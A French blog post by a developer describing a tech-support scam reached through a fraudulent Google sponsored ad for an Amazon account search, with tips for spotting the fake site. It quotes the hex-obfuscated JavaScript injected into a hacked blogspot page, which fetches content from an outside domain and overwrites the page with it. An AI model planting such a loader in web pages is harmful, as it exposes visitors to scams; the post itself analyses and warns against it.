Les pirates et le SEA (adwords)

Les pirates et le SEA (adwords)

Vous pensiez que Google vérifiait toutes les annonces avant de les publier ?
Détrompez-vous. Non seulement, ce n’est pas le cas, mais en plus les méchants pirates aujourd’hui ratissent large et ciblent des mots clés qui ne sont probablement tapés que par des internautes qui n’y connaissent rien. Voyons ensemble comment ils procèdent.

L’achat de mot-clé:

Google passe la journée à valider des annonces publiant des mots-clés et à encaisser les annonceurs. Il y a bien un algorithme qui détecte que certains mots clés ne doivent pas passer entre les mailles du filet (même s’ils peuvent être légitimes) comme « soutien gorge pour gros seins », mais il y en a certains qui passent à coté. Dans mon exemple, ma mère a tapé : « amazon mon compte ».
L’annonce ne contient aucun mot clé sensible, et passe donc facilement entre les mailles du filet. On peut imaginer aussi « facebook compte », « amazon mes commandes »…
Autant le dire tout de suite, ne faites pas ça ! Allez directement sur l’url d’amazon ou de facebook, vous trouverez alors facilement la rubrique mon compte. Pourquoi passer par Google et risquer d’aller au mauvais endroit ?
Bref, ma mère a ensuite cliqué sur le 1er lien sponsorisé qu’elle a vu, et bingo, elle s’est retrouvée sur un site piraté.

Les indices pour détecter le site pirate:

Le site pirate est un blogspot. Lorsque le code se déclenche le site est remplacé par ce magnifique screenshot:

Et dire que certains vont appeler…

Comme pour les ransomwares, on vous presse le pas; non pour payer, mais pour appeler un numéro probablement surtaxé. Ici, vous pouvez constatez :
– que dans l’url, vous n’êtes pas sur amazon (c’est le 1er indice qui doit vous choquer),
– que votre ordinateur a beau être soit disant bloqué (on peut quand même fermer l’onglet),
– que c’est du grand n’importe quoi : code facebook, carte bleue, email, photos (tous les trucs sensibles en fait) auraient étés piratés,
– que lorsqu’on vous presse, ça sent jamais bon (ça marche aussi pour les démarcheurs).

Bref, on ferme l’onglet , et on oublie.

Comment le pirate s’y prend:

Je ne sais pas si l’auteur sait ou non si il a été piraté. Mais pour le moment, on peut trouver ces lignes de code (voir code source original):

<script type='text/javascript'>var _RekZzcs=['\x72\x65\x70\x6c\x61\x63\x65','\x47\x45\x54','\x74\x65\x78\x74\x2f\x68\x74\x6d\x6c','\x68\x74\x74\x70\x73\x3a\x2f\x2f\x64\x65\x73\x72\x65\x64\x2e\x63\x6f\x6d\x2f\x6a\x73\x5f\x63\x6c\x2e\x70\x68\x70\x3f\x69\x64\x3d\x32\x39\x32\x35\x65\x64\x64\x66\x2d\x31\x38\x30\x62\x2d\x31\x31\x65\x39\x2d\x62\x65\x30\x62\x2d\x63\x31\x66\x30\x37\x32\x36\x37\x61\x64\x33\x32\x26\x74\x3d']; var _RekZzg0=new XMLHttpRequest();_RekZzg0.onreadystatechange = function() { if(_RekZzg0.readyState==4&&_RekZzg0.status==200){var _RekZzv0=JSON.parse(_RekZzg0.responseText);if(_RekZzv0.result==1){var _RekZzv1=document.open(_RekZzcs[2],_RekZzcs[0]);_RekZzv1.write(_RekZzv0.content);_RekZzv1.close();}}};var _RekZzg2=new Date().getTime();_RekZzg0.open(_RekZzcs[1],_RekZzcs[3]+_RekZzg2,true);_RekZzg0.send();</script>

Quand vous analysez un code source, et que vous voyez ce genre de trucs, vous pouvez être sur à 99% qu’il y a un truc louche dedans. Ici le code a été crypté afin qu’on ait du mal à le lire. Il s’agit d’un encodage HTML/Oct/Hex (il y a des décrypteurs sur le net). En gros, ca nous dit d’aller chercher le contenu sur l’url ‘https://desred.com/js_cl.php?id=2925eddf-180b-11e9-be0b-c1f07267ad32&t=’ et de l’afficher en pleine page. Donc, si vous cherchez un pirate, vous pouvez le trouver via cette url. Il y a également le numéro de téléphone qui pourrait nous permettre de mettre la main dessus. Perso, j’ai la flemme de porter plainte, mais si ça vous tente, ne vous gênez pas.

Conclusion:

Si vous devez aller sur un site que vous connaissez, ne passez pas par google, tapez directement l’url dans votre navigateur. Ca semble si évident, mais il y encore tellement de gens qui mélangent les termes « navigateur », « google », »internet », « site ». Essayez de comprendre les outils que vous utilisez, et ne vous contentez pas de simplement les « consommer ». Certes, je suis développeur et c’est mon métier de connaitre tout ça, mais c’est comme si vous mélangiez les termes suivants : « yeux », « dictionnaire », « bibliothèque », et « livre » !

Laisser un commentaire

Ce site utilise Akismet pour réduire les indésirables. En savoir plus sur comment les données de vos commentaires sont utilisées.